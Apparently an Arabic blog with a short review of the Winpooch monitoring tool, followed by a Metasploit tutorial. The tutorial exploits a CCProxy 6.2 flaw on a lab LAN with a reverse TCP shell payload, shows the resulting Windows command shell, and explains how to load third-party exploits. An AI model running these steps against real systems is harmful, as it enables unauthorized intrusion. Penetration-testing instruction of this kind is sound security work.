ما أتكلم عنه برنامج أستخدمه شخصيا عند استعمالي لنظام ويندوز اسمه Winpooch وبعد التجربة وجدت أن البرنامج رائع و فعال جدا و خفيف على الجهاز أيضا, يغنينا عن الكثير من البرامج الأخرى و يمكننا بواسطته مراقبة الجهاز بشكل كامل أو القيام بتحديد الأشياء التي نريد مراقبتها و عند حدوث أي شيء يظهر لنا البرنامج نافذة تشبه الصورة التالية:

تعلمنا بالبرنامج الذي يحاول القيام بأي تعديل على النظام أو احدى ملفاته أو خصائصه ان كان الريجستري أو محاولة الاتصال بالانترنت أو أي شيء آخر حسب الفلتر المحدد من خصائص البرنامج مع عدة خيارات مثل قبول التغيير أو رفضه…

صور للبرنامج و هو يعمل من جهازي نظام Windows XP

طبعا هذا ليس كل شيء فيوجد للبرنامج ميزات أخرى كثيرة أترككم لتطلعوا عليها بأنفسكم.. و بصراحة أعجبني أيضا فكرة البرنامج و تصميمه الذي أجده مميز بعض الشيء! و على الرغم من عدم تطوير البرنامج لفترة تزيد عن سنة الا أني أجده فعال جدا حتى وقتنا هذا و أنصح الجميع بتجربته.

موقع البرنامج | صفحة التحميل | معلومات عن البرنامج

ملاحظة: برنامج Winpooch يعمل على Windows XP SP2 و الاصدارات السابقة منه فقط! و لا يعمل على Windows XP SP3 أو Windows VISTA, شكرا للأخ أحمد لاعلامي بذلك.

و بالنهاية عذرا بسبب الانقطاع عن المدونة في الفترة السابقة فالبارحة رجعت من سفر دام لأربعة أيام بعد أن قمت بعمل جراحي باحدى مشافي العاصمة و كتبت هذا الموضوع البسيط بسرعة و أنا بحالة صعبة بصراحة و ان شاء الله سيتم نشر موضوع مفصل عن استغلال ثغرات Metasploit في اليومين القادمين حتى أرتاح قليلا, دعواتكم لي يا شباب و بالتوفيق للجميع

Follow @KAMINDOZ Tweet

استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل

بدأ مشروع ثغرات Metasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع Metasploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا…

لكل شيء محاسن و مساوء قوة مشروع ميتاسبلويت و سهولة استخدامه جعلت الكثيرين من الأطفال الذين يظنون أنفسهم Hackers يستخدمه لاختراق أجهزة الآخرين و التحكم بها بتنفيذ بضعة أوامر دون أي معرفة أو فهم بالثغرة, سببها, برمجتها أو حتى كيفية استغلالها و بصراحة ترددت كثيرا عند كتابة هذا الموضوع لأن الاختراق باستخدام مشروع ميتاسبلويت سهل جدا و احترافي لدرجة أننا قد نتمكن من اختراق جميع الأجهزة الموجودة معنا على الشبكة بسهولة و بتطبيق عدة أوامر فقط! و قبل أن أبدأ يجب معرفة أن الشرح للغرض العلمي فقط! و أنا لا أشجع أحد على تجربة ما ذكر هنا خارج نطاق شبكته الخاصة أو بدون اذن مسبق من مدير الشبكة و رغم محاولتي لتفصيل أغلب الخطوات المذكوره في الشرح الا أنه ليس موجه للمبتدئين أو للأشخاص الذين لا يملكون معرفة مسبقة بهذه الأمور و لن يتم التطرق لكيفية تنصيب المشروع على الجهاز فهذه الأشياء يجب أن تكون من البديهيات, سأستخدم سطر الأوامر بشكل أساسي و التطبيق سيكون على نظام Linux توزيعة BackTrack 3 على الاصدار 3.2 من مشروع ميتاسبلويت مع العلم من الممكن تطبيق بعض ما ذكر هنا على نظام ويندوز لكني لا أنصح بذلك!

نبدأ بفتح سطر الأوامر و من ثم الذهاب للمجلد الموجود به مشروع Metasploit في توزيعة BackTrack 3 سيكون المشروع في المسار التالي:

/pentest/exploits/framework3/

بعد ذلك نقوم بتشغيل سطر أوامر مشروع Metasploit بتنفيذ الأمر:

./msfconsole

أول ما يبدأ سطر أوامر Metasploit يعطينا معلومات عن حالة المشروع مثل الاصدار, عدد الثغرات الموجودة, عدد الأدوات و الـ Payloads و غيرها من الأمور الأخرى مايهمنها حاليا الثغرات فقط و هذا ما سأشرحه هنا. لنتمكن من استغلال ثغرة Metasploit هنالك بضعة خطوات يجب القيام بها, تختلف هذه الخطوات و الخيارات من ثغرة لأخرى الا أنها متشابهة بشكل عام. أول شيء علينا تحديد الثغرة التي نريد استغلالها بعد ذلك نحدد الخيارات الخاصة بها مثل الاصدار المصاب, نظام التشغيل, الاستغلال… ثم ننفذ الثغرة و نستخدمها حسب الاستغلال المحدد في الخيارات, يوجد الكثير من الأوامر التي يمكننا استخدامها في مشروع ميتاسبلويت لمعرفتها نقوم بتنفيذ الأمر التالي:

msf > help

ما يهمنا حاليا في استغلال الثغرات هي الأوامر المظللة في الصورة

msf > show exploits
msf > info exploit
msf > use exploit

نستخدم الأمر الأول لاظهار الثغرات الموجودة في المشروع أما الثاني لاظهار معلومات مفصلة عن الثغرة و مصادر خارجية عنها و الثالث لاستخدام الثغرة و تحديد خياراتها, أول شيء ننفذ الأمر الأول لاستعراض الثغرات الموجودة في المشروع

msf > show exploits

كما هو واضح تم اظهار عدد كبير من الثغرات و بجانب كل ثغرة معلومات بسيطة عن البرنامج/النظام و الاصدار المصاب و لاظهار معلومات مفصلة عن احدى الثغرات يكفي تنفيذ الأمر info , مثال على ذلك:

msf > info windows/proxy/ccproxy_telnet_ping

بعد تنفيذ الأمر السابق سيتم اظهار كافة المعلومات المتوفرة عن الثغرة الموجودة في برنامج CCProxy الاصدار 6.2 كما هو واضح في الصورة التالية:

قبل البدء باستخدام الثغرة نلاحظ الخيارات المتوفرة لها و كما قلت سابقا تختلف الخيارات من ثغرة لأخرى لكن في هذه الثغرة يوجد لدينا خيارين أساسيين الأول هو IP السيرفر الذي يستعمل برنامج CCProxy أما الثاني فهو المنفذ الذي يستخدمه البرنامج, أيضا لا ننسى تحديد النظام فهذا شيء مهم في ثغرات Metasploit خصوصا أنظمة Windows و اصداراتها و علينا معرفة أن استغلال هذه النوعية من الثغرات دقيق جدا و صعوبة استغلالها تكمن في دقتها فأي خيار خاطئ نحدده لن يمكننا من استغلال الثغرة بشكل صحيح, الأن ننفذ الأمر use لنستخدم الثغرة

msf > use windows/proxy/ccproxy_telnet_ping

و نستخدم الأمر show لاظهار خيارات الثغرة المتوفرة

msf  exploit(ccproxy_telnet_ping) > show options

نحدد الخيارات التي تناسبنا باستخدام الأمر set كما هو واضح من الصورة التالية:

أول شيء أظهرنا خيارات الثغرة باستخدام الأمر السابق ثم حددنا الخيار RHOST وهو IP الجهاز المستهدف و ذلك باستخدام الأمر:

msf  exploit(ccproxy_telnet_ping) > set RHOST 192.168.0.53

بالنسبة لي كان 192.168.0.53 و أبقيت الخيار RPORT نفسه 23 و هو المنفذ الذي يستخدمه برنامج CCProxy بشكل افتراضي و طبعا يمكن تغييره بحسب المنفذ المستخدم مثلا 34 باستخدام الأمر:

msf  exploit(ccproxy_telnet_ping) > set RPORT 34

بعد ذلك نقوم باظهار الأنظمة المتاحة باستخدام الأمر:

msf  exploit(ccproxy_telnet_ping) > show targets

نحدد الخيار 4 و هو نظام Windows XP SP2 – English بتنفيذ:

msf  exploit(ccproxy_telnet_ping) > set TARGET 4

أما الآن نظهر الاستغلالات المتاحة لهذه الثغرة باستخدام الأمر:

msf  exploit(ccproxy_telnet_ping) > show payloads

بالنسبة لي سأحدد الاستغلال windows/shell_reverse_tcp و يستخدم هذا الاستغلال لانشاء اتصال عكسي مع الجهاز الذي تم تنفيذ الثغرة عليه و نتحكم بالاتصالات من داخل مشروع ميتاسبلويت

msf  exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp

مع العلم من امكانية تحديد أي استغلال آخر نريد مثل تنفيذ أمر محدد على النظام, فتح منفذ و الاتصال به عن طريق أداة الـ Netcat, تحميل ملف و تشغيله أو حتى اضافة مستخدم جديد للنظام بصلاحيات Administrator, الأن ننفذ الأمر:

msf  exploit(ccproxy_telnet_ping) > show options

من جديد لمراجعة الخيارات المخصصة للثغرة أو لتعديل أي خيار مثل ما هو واضح بالصورة التالية:

يمكننا الأن تحديد خيارات الاستغلال مثل LHOST وهو IP جهازنا و LPORT هو المنفذ الذي سيتم الاتصال العكسي عن طريقه بتنفيذ الأمر:

msf  exploit(ccproxy_telnet_ping) > set LHOST 192.168.0.41

بالنسبة لي سأترك المنفذ 4444 نفسه دون تغيير, الأن لم يبقى علينا الا تطبيق الأمر

msf  exploit(ccproxy_telnet_ping) > exploit

لتنفيذ الثغرة و اذا كانت جميع الخيارات صحيحة سيتم تنفيذ الاستغلال و لنتمكن من مشاهدة الاتصالات العكسية الموجودة ننفذ الأمر:

msf > sessions -l

Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.41:23443 -> 192.168.0.53:1032

و من ثم ننفذ الأمر التالي للاتصال باحدى الاتصالات المتاحة و في هذه الحالة هو رقم 1

msf > sessions -i 1

[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> 

مع العلم من امكانية تنفيذ أكثر من استغلال على أكثر من جهاز و الحصول على اتصالات أخرى.. أو القيام بهذه العملية بشكل أوتوماتيكي باستخدام احدى أدوات ميتاسبلويت الخطيرة و هي db_autopwn التي سأترك شرحها لموضوع آخر و طبعا يوجد الكثير من الاستغلالت الأخرى أترك تجربتها لكم.

كل ما ذكر سابقا مجرد مثال بسيط عن احدى ثغرات الميتاسبلويت لكن المشروع أقوى من ذلك بكثير و يوجد له استخدمات و ثغرات أخرى قوية قد أشرحها قريبا ان شاء الله, كل ماعليك الأن هو التجربة و اعادة المحاولة و لا تتوقع أن تتمكن من استغلال الثغرة من أول مرة أو ثاني مرة و لا حتى بعد 10 مرات كل مرة تجرب بها ثغرة ستكشف شيء جديد و خطأ قمت به و تذكر أن الدقة أهم شيء في استغلال ثغرات مشروع الميتاسبلويت فتحديد البرنامج و الاصدار المصاب أصعب من استغلال الثغرة المكتوبة له. من الجميل أيضا في مشروع ميتاسبلويت هو وجود واجهات رسومية جميلة لتسهيل التعامل مع المشروع و مخصصة للأشخاص الذين لايحبون استخدام سطر الأوامر

الواجهة الرسومية العادية GUI لتشغيلها ننفذ الأمر التالي داخل مجلد مشروع Metasploit

./msfgui

الواجهة التي تعمل من المتصفح لتشغيلها ننفذ الأمر التالي داخل مجلد المشروع

./msfweb

بعد ذلك نفتح المتصفح على الرابط

http://127.0.0.1:55555

ماذا بعد؟ لنفرض الآن أننا نريد استغلال ثغرة غير موجودة في مشروع الميتاسبلويت أحضرناها من موقع Milw0rm مثلا كيف سنضيفها؟ بصراحة وجدت الكثيرين لا يعرفون الطريقة رغم بساطتها و طبعا الشرح للينوكس و نصيحة للجميع ابتعدوا عن ويندوز في هذه الأمور, كما نعرف في الاصدار 2 السابق من مشروع Metasploit كان المشروع و ثغراته تبرمج بلغة Perl و تأتي بالامتداد pm أما في الاصدار 3 تم اعادة برمجة المشروع من جديد بلغة Ruby و تأتي الثغرة بالامتداد rb لذلك أول شيء علينا معرفة نوعية الثغرة هل هي للاصدار 3.0 أم لاصدارات سابقة 2.0 ؟ أتوقع أن الاختلاف بين الكود البرمجي بين اللغتين واضح جدا (مثال عن ثغرة للاصدار 2 – مثال عن ثغرة للاصدار 3) طبعا الشرح هنا موجه للاصدار 3.0 فهذا مانتكلم عنه في هذا الموضوع, اذا اطلعنا على كود الثغرة و ركزنا على السطر التالي:

class Exploits::Windows:: Driver::Intel_Centrino_2200BG_driver_probe < Msf::Exploit::Remote

سنعرف أن الثغرة لنظام Windows مصنفة في Driver اسمها Intel_Centrino_2200BG_driver_probe الأن كل ماعلينا هو التوجه للمجلد الموجود في المسار التالي:

/home/USER/.msf3/

طبعا مع استبدال USER باسم المستخدم عندك في نظام لينوكس و اذا لم يكن المجلد موجود يمكننا انشاؤه ببساطة! أما اذا كنت تعمل بالمستخدم root كما في توزيعة BackTrack سيكون مسار المجلد:

/root/.msf3

بعد الدخول للمجلد ننشئ مجلد جديد باسم modules بداخله مجلد آخر باسم exploits ليصبح المسار النهائي بهذا الشكل:

/home/USER/.msf3/modules/exploits

الأن ننشئ بداخل مجلد exploits مجلد باسم windows بداخله مجلد driver بعد ذلك ندخل للمجلد driver و ننشئ ملف الثغرة باسم Intel_Centrino_2200BG_driver_probe متبوعا بالامتداد .rb و بداخله كود الثغرة كامل ليصبح مسار الثغرة النهائي:

/home/USER/.msf3/modules/exploits/windows/driver/Intel_Centrino_2200BG_driver_probe.rb

جميل جدا الأن كل ماعلينا هو تشغيل سطر أوامر مشروع Metasploit من جديد و ملاحظة عدد الثغرات قبل و بعد تطبيق ما سبق و سنلاحظ وجود الثغرة ضمن قائمة الثغرات الموجودة في المشروع!

أما اذا أردنا تحديث المشروع بشكل كامل و اضافة ثغرات و أدوات جديدة.. يكفي الدخول لمجلد المشروع و من ثم تطبيق الأمر التالي:

svn update

أخيرا يرجى في حال وجود أي خطأ في الشرح تنبيهي له مهما كان بسيط فالشرح طويل نوعا ما و رغم تجريب ماذكر و محاولتي لتجنب الوقع بأي خطأ فقد أسهو أحيانا, أتمنى أن يكون الموضوع قد نال اعجابكم و يرجى عدم نقل الموضوع دون الاشارة برابط للمصدر!

كتاب: Metasploit Toolkit for Penetration Testing Exploit Development and Vulnerability Research الكتاب يحتوي على شروحات متقدمة لاستخدامات مشروع الميتاسبلويت و برمجة ثغراته بالاضافة للعديد من الأمور الأخرى, اذا كنت مهتم بالحصول على نسخة من الكتاب يمكنك شراؤه من موقع أمازون من هذه الصفحة.

Follow @KAMINDOZ Tweet